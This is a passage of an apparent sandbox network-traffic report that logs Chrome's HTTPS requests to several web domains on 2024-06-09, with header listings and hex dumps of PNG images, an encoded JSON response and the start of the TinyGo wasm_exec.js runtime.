                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Referer: https://yh8613.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:19 UTC283INHTTP/1.1 200 OK
                                                                                                                                                          Server: Tengine
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:18 GMT
                                                                                                                                                          Content-Type: application/json
                                                                                                                                                          Via: 1.1 google
                                                                                                                                                          Content-Length: 3392
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          X-NWS-LOG-UUID: 10400778610913397450
                                                                                                                                                          Connection: close
                                                                                                                                                          X-Cache-Lookup: Cache Miss
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:19 UTC2595INData Raw: 75 39 6d 45 50 55 47 69 48 6c 45 6d 54 43 67 74 46 76 45 6e 33 71 50 46 54 30 2b 39 34 4e 63 74 6c 38 4d 42 72 4b 4d 62 35 67 32 62 79 2b 37 76 74 61 62 61 61 32 4f 42 52 4b 72 41 52 39 6c 69 5a 4d 6d 4d 46 30 6f 68 37 36 32 47 64 30 42 41 70 4a 66 52 72 67 54 37 77 50 59 4c 4e 74 56 34 2f 39 46 42 6f 7a 63 41 78 36 73 79 6f 64 75 75 70 76 6f 70 78 4e 72 66 59 6d 79 46 67 66 61 56 70 72 2f 6c 69 2f 68 34 35 56 75 43 41 74 62 6b 66 4e 52 51 4e 33 4f 4a 4a 4e 58 7a 49 4e 54 70 36 52 41 6d 39 75 2f 41 42 43 37 70 78 56 6d 31 73 79 55 79 43 49 5a 41 38 4e 68 67 70 72 63 58 32 53 6c 42 77 63 6b 46 49 6b 44 45 48 4f 6c 38 4c 44 51 31 78 66 74 47 45 69 31 58 68 34 50 66 6f 53 76 39 6b 78 4b 72 61 6d 4b 6f 64 4e 6f 48 6c 6b 47 50 47 4e 53 35 54 30 6a 46 4d 53 42
                                                                                                                                                          Data Ascii: u9mEPUGiHlEmTCgtFvEn3qPFT0+94Nctl8MBrKMb5g2by+7vtabaa2OBRKrAR9liZMmMF0oh762Gd0BApJfRrgT7wPYLNtV4/9FBozcAx6syoduupvopxNrfYmyFgfaVpr/li/h45VuCAtbkfNRQN3OJJNXzINTp6RAm9u/ABC7pxVm1syUyCIZA8NhgprcX2SlBwckFIkDEHOl8LDQ1xftGEi1Xh4PfoSv9kxKramKodNoHlkGPGNS5T0jFMSB
                                                                                                                                                          2024-06-09 22:41:19 UTC797INData Raw: 52 76 37 47 33 44 47 67 6a 4a 4d 42 61 6c 4c 57 51 51 77 47 54 4a 4b 4c 34 41 30 4a 38 70 52 44 35 68 6b 76 74 50 75 51 46 34 4f 50 66 63 4e 62 4e 36 67 59 30 50 77 7a 4b 71 4f 76 4c 77 57 57 4f 6c 6b 62 47 61 2f 51 55 42 35 4f 51 6e 57 61 77 6b 4a 31 64 34 41 61 66 4f 77 53 32 73 54 2b 39 4d 4f 68 79 37 45 4c 39 51 6b 66 70 7a 77 79 5a 38 31 78 67 58 41 44 2b 49 63 59 68 76 4c 2b 33 35 54 42 59 4f 70 56 6b 68 6a 54 45 47 7a 50 44 6f 46 43 35 57 78 49 79 6f 49 76 36 74 70 77 56 6f 6b 45 4c 78 49 4d 54 45 73 58 38 4e 68 78 4f 64 78 49 62 4c 38 43 36 65 4f 34 33 47 39 71 58 45 4c 58 53 6d 6f 36 4f 63 77 35 55 66 50 42 57 5a 74 65 6b 7a 64 58 65 54 50 79 79 76 68 44 61 49 6f 52 2b 35 46 32 32 68 44 31 77 4c 4d 6a 6b 74 72 45 4f 31 68 4d 69 2f 77 35 64 58 44
                                                                                                                                                          Data Ascii: Rv7G3DGgjJMBalLWQQwGTJKL4A0J8pRD5hkvtPuQF4OPfcNbN6gY0PwzKqOvLwWWOlkbGa/QUB5OQnWawkJ1d4AafOwS2sT+9MOhy7EL9QkfpzwyZ81xgXAD+IcYhvL+35TBYOpVkhjTEGzPDoFC5WxIyoIv6tpwVokELxIMTEsX8NhxOdxIbL8C6eO43G9qXELXSmo6Ocw5UfPBWZtekzdXeTPyyvhDaIoR+5F22hD1wLMjktrEO1hMi/w5dXD


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          509192.168.2.55028990.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:18 UTC654OUTGET /pc/image-pc/index/383/login/loginbg.png HTTP/1.1
                                                                                                                                                          Host: zb1-hw.qectyoua.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                          Referer: https://zb1-hw.qectyoua.com/pc/240516-03/static/css/t4045.css
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:19 UTC615INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:18 GMT
                                                                                                                                                          Content-Type: image/png
                                                                                                                                                          Content-Length: 9556
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Tue, 25 Jul 2023 09:14:19 GMT
                                                                                                                                                          ETag: "64bf926b-2554"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE1[3],EU-GER-frankfurt-EDGE5-CACHE5[0,TCP_HIT,2],EU-FRA-paris-GLOBAL1-CACHE2[4],EU-FRA-paris-GLOBAL1-CACHE16[0,TCP_HIT,1],1.1 google
                                                                                                                                                          X-CCDN-Expires: 2467540
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: 12a22badc6d2e4fb35a9a6d0fd977a01
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 124460
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:19 UTC9556INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 e8 00 00 01 36 08 06 00 00 00 6b ea de 93 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 03 26 69 54 58 74 58 4d 4c 3a 63 6f 6d 2e 61 64 6f 62 65 2e 78 6d 70 00 00 00 00 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 36 2d 63 31 33 38 20 37 39 2e 31 35 39 38 32 34 2c 20 32 30 31 36 2f 30 39 2f 31 34 2d 30 31 3a 30 39 3a 30 31 20 20
                                                                                                                                                          Data Ascii: PNGIHDR6ktEXtSoftwareAdobe ImageReadyqe<&iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          510192.168.2.55028890.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:18 UTC649OUTGET /pc/image-pc/index/383/menu/nv1.png HTTP/1.1
                                                                                                                                                          Host: zb1-hw.qectyoua.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                          Referer: https://zb1-hw.qectyoua.com/pc/240516-03/static/css/t4045.css
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:18 UTC613INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:18 GMT
                                                                                                                                                          Content-Type: image/png
                                                                                                                                                          Content-Length: 1591
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Tue, 25 Jul 2023 09:14:20 GMT
                                                                                                                                                          ETag: "64bf926c-637"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE2[4],EU-GER-frankfurt-EDGE5-CACHE2[0,TCP_HIT,3],EU-FRA-paris-GLOBAL1-CACHE4[3],EU-FRA-paris-GLOBAL1-CACHE1[0,TCP_HIT,2],1.1 google
                                                                                                                                                          X-CCDN-Expires: 2467540
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: 9e7964d3ab85d68a397f0ce4847660fd
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 124460
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:18 UTC1591INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 1c 00 00 00 19 08 06 00 00 00 22 c0 4e 27 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 03 26 69 54 58 74 58 4d 4c 3a 63 6f 6d 2e 61 64 6f 62 65 2e 78 6d 70 00 00 00 00 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 36 2d 63 31 33 38 20 37 39 2e 31 35 39 38 32 34 2c 20 32 30 31 36 2f 30 39 2f 31 34 2d 30 31 3a 30 39 3a 30 31 20 20
                                                                                                                                                          Data Ascii: PNGIHDR"N'tEXtSoftwareAdobe ImageReadyqe<&iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          511192.168.2.55028790.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:18 UTC649OUTGET /pc/image-pc/index/383/menu/nv2.png HTTP/1.1
                                                                                                                                                          Host: zb1-hw.qectyoua.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                          Referer: https://zb1-hw.qectyoua.com/pc/240516-03/static/css/t4045.css
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:18 UTC615INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:18 GMT
                                                                                                                                                          Content-Type: image/png
                                                                                                                                                          Content-Length: 1545
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Tue, 25 Jul 2023 09:14:21 GMT
                                                                                                                                                          ETag: "64bf926d-609"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE4[3],EU-GER-frankfurt-EDGE5-CACHE3[0,TCP_HIT,2],EU-FRA-paris-GLOBAL1-CACHE29[4],EU-FRA-paris-GLOBAL1-CACHE27[0,TCP_HIT,2],1.1 google
                                                                                                                                                          X-CCDN-Expires: 2467540
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: e0488c966c8b9d7315415cceafcdc3ae
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 124460
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:18 UTC1545INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 19 00 00 00 1a 08 06 00 00 00 42 7d f7 cd 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 03 26 69 54 58 74 58 4d 4c 3a 63 6f 6d 2e 61 64 6f 62 65 2e 78 6d 70 00 00 00 00 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 36 2d 63 31 33 38 20 37 39 2e 31 35 39 38 32 34 2c 20 32 30 31 36 2f 30 39 2f 31 34 2d 30 31 3a 30 39 3a 30 31 20 20
                                                                                                                                                          Data Ascii: PNGIHDRB}tEXtSoftwareAdobe ImageReadyqe<&iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          512192.168.2.550293188.114.96.34434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:18 UTC524OUTGET /wasm_exec.js HTTP/1.1
                                                                                                                                                          Host: stt-wasm.ai4funs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                          Referer: https://js326.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:18 UTC860INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:18 GMT
                                                                                                                                                          Content-Type: application/javascript
                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                          Connection: close
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          Cache-Control: public, max-age=14400, must-revalidate
                                                                                                                                                          ETag: W/"cb86ea27dd7c6c898f98d617d86fb707"
                                                                                                                                                          referrer-policy: strict-origin-when-cross-origin
                                                                                                                                                          x-content-type-options: nosniff
                                                                                                                                                          x-robots-tag: nosnippet
                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CGOx5SWCPNPx5Hr8zkvQCQE%2BGVKCALe7S3kwKNYUbcGCt1utclKA5dEBDjEfFH%2FXF05pz%2FABOUszeu4%2BPaPVWRDhHx3RxaQWnGjKy%2B%2Bdsp9GEkba2n81jXf%2FQdg4NGM%2FmmqUvbJ8ig%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                          CF-Cache-Status: HIT
                                                                                                                                                          Age: 447
                                                                                                                                                          Server: cloudflare
                                                                                                                                                          CF-RAY: 8914a0dc3a3e47ab-DFW
                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                          2024-06-09 22:41:18 UTC509INData Raw: 33 66 36 34 0d 0a 2f 2f 20 43 6f 70 79 72 69 67 68 74 20 32 30 31 38 20 54 68 65 20 47 6f 20 41 75 74 68 6f 72 73 2e 20 41 6c 6c 20 72 69 67 68 74 73 20 72 65 73 65 72 76 65 64 2e 0a 2f 2f 20 55 73 65 20 6f 66 20 74 68 69 73 20 73 6f 75 72 63 65 20 63 6f 64 65 20 69 73 20 67 6f 76 65 72 6e 65 64 20 62 79 20 61 20 42 53 44 2d 73 74 79 6c 65 0a 2f 2f 20 6c 69 63 65 6e 73 65 20 74 68 61 74 20 63 61 6e 20 62 65 20 66 6f 75 6e 64 20 69 6e 20 74 68 65 20 4c 49 43 45 4e 53 45 20 66 69 6c 65 2e 0a 2f 2f 0a 2f 2f 20 54 68 69 73 20 66 69 6c 65 20 68 61 73 20 62 65 65 6e 20 6d 6f 64 69 66 69 65 64 20 66 6f 72 20 75 73 65 20 62 79 20 74 68 65 20 54 69 6e 79 47 6f 20 63 6f 6d 70 69 6c 65 72 2e 0a 0a 28 28 29 20 3d 3e 20 7b 0a 09 2f 2f 20 4d 61 70 20 6d 75 6c 74 69 70
                                                                                                                                                          Data Ascii: 3f64// Copyright 2018 The Go Authors. All rights reserved.// Use of this source code is governed by a BSD-style// license that can be found in the LICENSE file.//// This file has been modified for use by the TinyGo compiler.(() => {// Map multip
                                                                                                                                                          2024-06-09 22:41:18 UTC1369INData Raw: 09 7d 20 65 6c 73 65 20 69 66 20 28 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 20 21 3d 3d 20 22 75 6e 64 65 66 69 6e 65 64 22 29 20 7b 0a 09 09 77 69 6e 64 6f 77 2e 67 6c 6f 62 61 6c 20 3d 20 77 69 6e 64 6f 77 3b 0a 09 7d 20 65 6c 73 65 20 69 66 20 28 74 79 70 65 6f 66 20 73 65 6c 66 20 21 3d 3d 20 22 75 6e 64 65 66 69 6e 65 64 22 29 20 7b 0a 09 09 73 65 6c 66 2e 67 6c 6f 62 61 6c 20 3d 20 73 65 6c 66 3b 0a 09 7d 20 65 6c 73 65 20 7b 0a 09 09 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 63 61 6e 6e 6f 74 20 65 78 70 6f 72 74 20 47 6f 20 28 6e 65 69 74 68 65 72 20 67 6c 6f 62 61 6c 2c 20 77 69 6e 64 6f 77 20 6e 6f 72 20 73 65 6c 66 20 69 73 20 64 65 66 69 6e 65 64 29 22 29 3b 0a 09 7d 0a 0a 09 69 66 20 28 21 67 6c 6f 62 61 6c 2e 72 65 71 75 69 72 65 20
                                                                                                                                                          Data Ascii: } else if (typeof window !== "undefined") {window.global = window;} else if (typeof self !== "undefined") {self.global = self;} else {throw new Error("cannot export Go (neither global, window nor self is defined)");}if (!global.require
                                                                                                                                                          2024-06-09 22:41:18 UTC1369INData Raw: 2c 0a 09 09 09 66 63 68 6f 77 6e 28 66 64 2c 20 75 69 64 2c 20 67 69 64 2c 20 63 61 6c 6c 62 61 63 6b 29 20 7b 20 63 61 6c 6c 62 61 63 6b 28 65 6e 6f 73 79 73 28 29 29 3b 20 7d 2c 0a 09 09 09 66 73 74 61 74 28 66 64 2c 20 63 61 6c 6c 62 61 63 6b 29 20 7b 20 63 61 6c 6c 62 61 63 6b 28 65 6e 6f 73 79 73 28 29 29 3b 20 7d 2c 0a 09 09 09 66 73 79 6e 63 28 66 64 2c 20 63 61 6c 6c 62 61 63 6b 29 20 7b 20 63 61 6c 6c 62 61 63 6b 28 6e 75 6c 6c 29 3b 20 7d 2c 0a 09 09 09 66 74 72 75 6e 63 61 74 65 28 66 64 2c 20 6c 65 6e 67 74 68 2c 20 63 61 6c 6c 62 61 63 6b 29 20 7b 20 63 61 6c 6c 62 61 63 6b 28 65 6e 6f 73 79 73 28 29 29 3b 20 7d 2c 0a 09 09 09 6c 63 68 6f 77 6e 28 70 61 74 68 2c 20 75 69 64 2c 20 67 69 64 2c 20 63 61 6c 6c 62 61 63 6b 29 20 7b 20 63 61 6c 6c
                                                                                                                                                          Data Ascii: ,fchown(fd, uid, gid, callback) { callback(enosys()); },fstat(fd, callback) { callback(enosys()); },fsync(fd, callback) { callback(null); },ftruncate(fd, length, callback) { callback(enosys()); },lchown(path, uid, gid, callback) { call
                                                                                                                                                          2024-06-09 22:41:18 UTC1369INData Raw: 69 72 28 29 20 7b 20 74 68 72 6f 77 20 65 6e 6f 73 79 73 28 29 3b 20 7d 2c 0a 09 09 7d 0a 09 7d 0a 0a 09 69 66 20 28 21 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 29 20 7b 0a 09 09 63 6f 6e 73 74 20 6e 6f 64 65 43 72 79 70 74 6f 20 3d 20 72 65 71 75 69 72 65 28 22 63 72 79 70 74 6f 22 29 3b 0a 09 09 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 20 3d 20 7b 0a 09 09 09 67 65 74 52 61 6e 64 6f 6d 56 61 6c 75 65 73 28 62 29 20 7b 0a 09 09 09 09 6e 6f 64 65 43 72 79 70 74 6f 2e 72 61 6e 64 6f 6d 46 69 6c 6c 53 79 6e 63 28 62 29 3b 0a 09 09 09 7d 2c 0a 09 09 7d 3b 0a 09 7d 0a 0a 09 69 66 20 28 21 67 6c 6f 62 61 6c 2e 70 65 72 66 6f 72 6d 61 6e 63 65 29 20 7b 0a 09 09 67 6c 6f 62 61 6c 2e 70 65 72 66 6f 72 6d 61 6e 63 65 20 3d 20 7b 0a 09 09 09 6e 6f 77 28 29 20 7b 0a 09
                                                                                                                                                          Data Ascii: ir() { throw enosys(); },}}if (!global.crypto) {const nodeCrypto = require("crypto");global.crypto = {getRandomValues(b) {nodeCrypto.randomFillSync(b);},};}if (!global.performance) {global.performance = {now() {
                                                                                                                                                          2024-06-09 22:41:18 UTC1369INData Raw: 09 09 69 66 20 28 21 69 73 4e 61 4e 28 66 29 29 20 7b 0a 09 09 09 09 09 72 65 74 75 72 6e 20 66 3b 0a 09 09 09 09 7d 0a 0a 09 09 09 09 63 6f 6e 73 74 20 69 64 20 3d 20 6d 65 6d 28 29 2e 67 65 74 55 69 6e 74 33 32 28 61 64 64 72 2c 20 74 72 75 65 29 3b 0a 09 09 09 09 72 65 74 75 72 6e 20 74 68 69 73 2e 5f 76 61 6c 75 65 73 5b 69 64 5d 3b 0a 09 09 09 7d 0a 0a 09 09 09 63 6f 6e 73 74 20 73 74 6f 72 65 56 61 6c 75 65 20 3d 20 28 61 64 64 72 2c 20 76 29 20 3d 3e 20 7b 0a 09 09 09 09 63 6f 6e 73 74 20 6e 61 6e 48 65 61 64 20 3d 20 30 78 37 46 46 38 30 30 30 30 3b 0a 0a 09 09 09 09 69 66 20 28 74 79 70 65 6f 66 20 76 20 3d 3d 3d 20 22 6e 75 6d 62 65 72 22 29 20 7b 0a 09 09 09 09 09 69 66 20 28 69 73 4e 61 4e 28 76 29 29 20 7b 0a 09 09 09 09 09 09 6d 65 6d 28 29
                                                                                                                                                          Data Ascii: if (!isNaN(f)) {return f;}const id = mem().getUint32(addr, true);return this._values[id];}const storeValue = (addr, v) => {const nanHead = 0x7FF80000;if (typeof v === "number") {if (isNaN(v)) {mem()
                                                                                                                                                          2024-06-09 22:41:18 UTC1369INData Raw: 20 22 73 79 6d 62 6f 6c 22 3a 0a 09 09 09 09 09 09 74 79 70 65 46 6c 61 67 20 3d 20 33 3b 0a 09 09 09 09 09 09 62 72 65 61 6b 3b 0a 09 09 09 09 09 63 61 73 65 20 22 66 75 6e 63 74 69 6f 6e 22 3a 0a 09 09 09 09 09 09 74 79 70 65 46 6c 61 67 20 3d 20 34 3b 0a 09 09 09 09 09 09 62 72 65 61 6b 3b 0a 09 09 09 09 7d 0a 09 09 09 09 6d 65 6d 28 29 2e 73 65 74 55 69 6e 74 33 32 28 61 64 64 72 20 2b 20 34 2c 20 6e 61 6e 48 65 61 64 20 7c 20 74 79 70 65 46 6c 61 67 2c 20 74 72 75 65 29 3b 0a 09 09 09 09 6d 65 6d 28 29 2e 73 65 74 55 69 6e 74 33 32 28 61 64 64 72 2c 20 69 64 2c 20 74 72 75 65 29 3b 0a 09 09 09 7d 0a 0a 09 09 09 63 6f 6e 73 74 20 6c 6f 61 64 53 6c 69 63 65 20 3d 20 28 61 72 72 61 79 2c 20 6c 65 6e 2c 20 63 61 70 29 20 3d 3e 20 7b 0a 09 09 09 09 72 65
                                                                                                                                                          Data Ascii: "symbol":typeFlag = 3;break;case "function":typeFlag = 4;break;}mem().setUint32(addr + 4, nanHead | typeFlag, true);mem().setUint32(addr, id, true);}const loadSlice = (array, len, cap) => {re
                                                                                                                                                          2024-06-09 22:41:18 UTC1369INData Raw: 69 74 65 20 6c 69 6e 65 0a 09 09 09 09 09 09 09 09 09 09 6c 65 74 20 6c 69 6e 65 20 3d 20 64 65 63 6f 64 65 72 2e 64 65 63 6f 64 65 28 6e 65 77 20 55 69 6e 74 38 41 72 72 61 79 28 6c 6f 67 4c 69 6e 65 29 29 3b 0a 09 09 09 09 09 09 09 09 09 09 6c 6f 67 4c 69 6e 65 20 3d 20 5b 5d 3b 0a 09 09 09 09 09 09 09 09 09 09 63 6f 6e 73 6f 6c 65 2e 6c 6f 67 28 6c 69 6e 65 29 3b 0a 09 09 09 09 09 09 09 09 09 7d 20 65 6c 73 65 20 7b 0a 09 09 09 09 09 09 09 09 09 09 6c 6f 67 4c 69 6e 65 2e 70 75 73 68 28 63 29 3b 0a 09 09 09 09 09 09 09 09 09 7d 0a 09 09 09 09 09 09 09 09 7d 0a 09 09 09 09 09 09 09 7d 0a 09 09 09 09 09 09 7d 20 65 6c 73 65 20 7b 0a 09 09 09 09 09 09 09 63 6f 6e 73 6f 6c 65 2e 65 72 72 6f 72 28 27 69 6e 76 61 6c 69 64 20 66 69 6c 65 20 64 65 73 63 72 69
                                                                                                                                                          Data Ascii: ite linelet line = decoder.decode(new Uint8Array(logLine));logLine = [];console.log(line);} else {logLine.push(c);}}}} else {console.error('invalid file descri
